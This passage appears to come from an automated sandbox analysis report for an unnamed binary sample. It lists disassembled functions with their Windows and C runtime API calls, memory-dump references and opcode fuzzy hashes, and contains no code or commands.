                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastsend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1802528911-0
                                                                                                                                                        • Opcode ID: 3b2e9a9b1f8c39f99b09797ab9707c4e900d36610160df628dffa3e5847c9453
                                                                                                                                                        • Instruction ID: b837f0e2ac2e3003028615bc59989d5d42dbadfafd55883456ad374116189006
                                                                                                                                                        • Opcode Fuzzy Hash: 3b2e9a9b1f8c39f99b09797ab9707c4e900d36610160df628dffa3e5847c9453
                                                                                                                                                        • Instruction Fuzzy Hash: C2014F353002009FD710EF29D991B6AB7E9EF99720F11852EE65A87392CB70EC05CB61
                                                                                                                                                        Function 00AB4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • __lock_file.LIBCMT ref: 00AB42B9
                                                                                                                                                          • Part of subcall function 00AB5A9F: __lock.LIBCMT ref: 00AB5AC2
                                                                                                                                                        • __fclose_nolock.LIBCMT ref: 00AB42C4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                                        • Opcode ID: 027a6b00d4adba6d60c4de9df9df228556deb6994a83ce347c0768d63b609c80
                                                                                                                                                        • Instruction ID: 075acd37466d43119495b0c23004991a69f874f3cd19e1d6434bc75c533fb873
                                                                                                                                                        • Opcode Fuzzy Hash: 027a6b00d4adba6d60c4de9df9df228556deb6994a83ce347c0768d63b609c80
                                                                                                                                                        • Instruction Fuzzy Hash: 4CF0E931D017549ADB10BB7589027DE7BECAF85334F218209F824AB1C3CBBC8941AF51
                                                                                                                                                        Function 00AAF55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM ref: 00AAF57A
                                                                                                                                                          • Part of subcall function 00A9E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E279
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00B075D3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1792118007-0
                                                                                                                                                        • Opcode ID: db0855d2afd94acd76a0b928d21acfbccdc211eab93941b24b6c67576c22ce78
                                                                                                                                                        • Instruction ID: 8065a108a13bbd7e85fa32c288dff3c124bf838777e49652c475fcb8424dca4a
                                                                                                                                                        • Opcode Fuzzy Hash: db0855d2afd94acd76a0b928d21acfbccdc211eab93941b24b6c67576c22ce78
                                                                                                                                                        • Instruction Fuzzy Hash: FAF08C712406159FD314EF69D905B96BBE8EF58320F00442AF819D7292DF70AC00CBE0
                                                                                                                                                        Function 00A981C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • __wcsnicmp.LIBCMT ref: 00A983C4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __itow__swprintf__wcsnicmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 712828618-0
                                                                                                                                                        • Opcode ID: 644cb6cfc36239dde98e496c7c38761c236fa2d777c94794c5dffbcf05f0f947
                                                                                                                                                        • Instruction ID: 16e688d6b3f10c81dc8a2d751b6e7f2ee4c0f641be6517796e908cae650def85
                                                                                                                                                        • Opcode Fuzzy Hash: 644cb6cfc36239dde98e496c7c38761c236fa2d777c94794c5dffbcf05f0f947
                                                                                                                                                        • Instruction Fuzzy Hash: BBF15875608302AFCB04DF58C98186FBBE5FF9A304F54891DF9958B261EB34E905CB52
                                                                                                                                                        Function 00AA4040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                                        • Instruction ID: a8098dac85aefcd621b19bc604867d0792c38c888093cf14ac35d4ac66286c54
                                                                                                                                                        • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                                        • Instruction Fuzzy Hash: B061AFB0A042069FCB00DF55C980A7AF7F8FF5A310F148669F91687681E7B5EC95CB91
                                                                                                                                                        Function 00AAEF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 784817614da0cd8cc0a830e556810c613da0cc6435538ba30c77bb68efe60aa0
                                                                                                                                                        • Instruction ID: 4e4011fab74a96f2bf4af3aba1ac75457eee6f0d55706d0c37fc8b5fa17d076f
                                                                                                                                                        • Opcode Fuzzy Hash: 784817614da0cd8cc0a830e556810c613da0cc6435538ba30c77bb68efe60aa0
                                                                                                                                                        • Instruction Fuzzy Hash: 78517335700214AFCF18EBA8CA91EAD7BEAAF49310B144199F9069B3D2DB31ED45D750
                                                                                                                                                        Function 00A9B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                        • Instruction ID: 0c76a4ff97252e46c07682dd4f715a70f0ab3722454e3893d4a2eb01d9bb5a83
                                                                                                                                                        • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                        • Instruction Fuzzy Hash: 4D41CE79201602CFCB24DF59E580962F7F4FF88360714C66EE99A8B761EB30E851CB20
                                                                                                                                                        Function 00A94EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00A94F8F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                        • Opcode ID: 5cbfb3e2f855af56b852894e0cab8aa8521f162dd3468d4c910bc6f8f043394a
                                                                                                                                                        • Instruction ID: 6efc341883f65becc74ad7cdb5ec811b949069ed9d1c8e18a946b2f486597f44
                                                                                                                                                        • Opcode Fuzzy Hash: 5cbfb3e2f855af56b852894e0cab8aa8521f162dd3468d4c910bc6f8f043394a
                                                                                                                                                        • Instruction Fuzzy Hash: 65314671B0061AAFCF08CF6DC580AADB7F5BF88710F14862AE81997750D770B9A1CB90
                                                                                                                                                        Function 00AAF92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: select
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                        • Instruction ID: a9b5a818cbf73ec010a63d7029733e49233c0247e94bc461045fff11e23793c4
                                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                        • Instruction Fuzzy Hash: CB31C670A00106AFD758DF98D480A6AFBB5FF4A350B2486A5E449CB295D731EDC1CBD0
                                                                                                                                                        Function 00B0AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                        • Opcode ID: 885facb11628f535c2d8236fae580fbebe3450be5e8ab95c1773e844ec717001
                                                                                                                                                        • Instruction ID: 4eb42c4d736f983232443b34ba67c180eb3c4bfe637ab338b3920f6e70768370
                                                                                                                                                        • Opcode Fuzzy Hash: 885facb11628f535c2d8236fae580fbebe3450be5e8ab95c1773e844ec717001
                                                                                                                                                        • Instruction Fuzzy Hash: CE411B745046518FEB24CF18C584F1ABBE1BF49318F19899CE99A4B3A2C372E885CF52
                                                                                                                                                        Function 00A94D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: b82e88169727a85e702686efe194600aad7e0a55db005200254e0eebdecbc88b
                                                                                                                                                        • Instruction ID: d7191ee442c702c9c7083a336bd2d73fd6289aa98321d834ef15ff812ca08d37
                                                                                                                                                        • Opcode Fuzzy Hash: b82e88169727a85e702686efe194600aad7e0a55db005200254e0eebdecbc88b
                                                                                                                                                        • Instruction Fuzzy Hash: 6B2124B0A00608EBCF149F15E880A6E7FF8FB57340F2189ADE586C6050EB309AD0D715
                                                                                                                                                        Function 00A9D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                                        • Instruction ID: e7e6aba63dc7b1ee23a6f08af43e1829c20137121d0751de74d8227c533ebdf8
                                                                                                                                                        • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                                        • Instruction Fuzzy Hash: B6115175600601DFCB24DF28D581956BBF9FF49350720C46EE48ECB662E732E881CB50
                                                                                                                                                        Function 00A93F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A93F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00A93F90
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A934E2,?,00000001), ref: 00A93FCD
                                                                                                                                                          • Part of subcall function 00A93E78: FreeLibrary.KERNEL32(00000000), ref: 00A93EAB
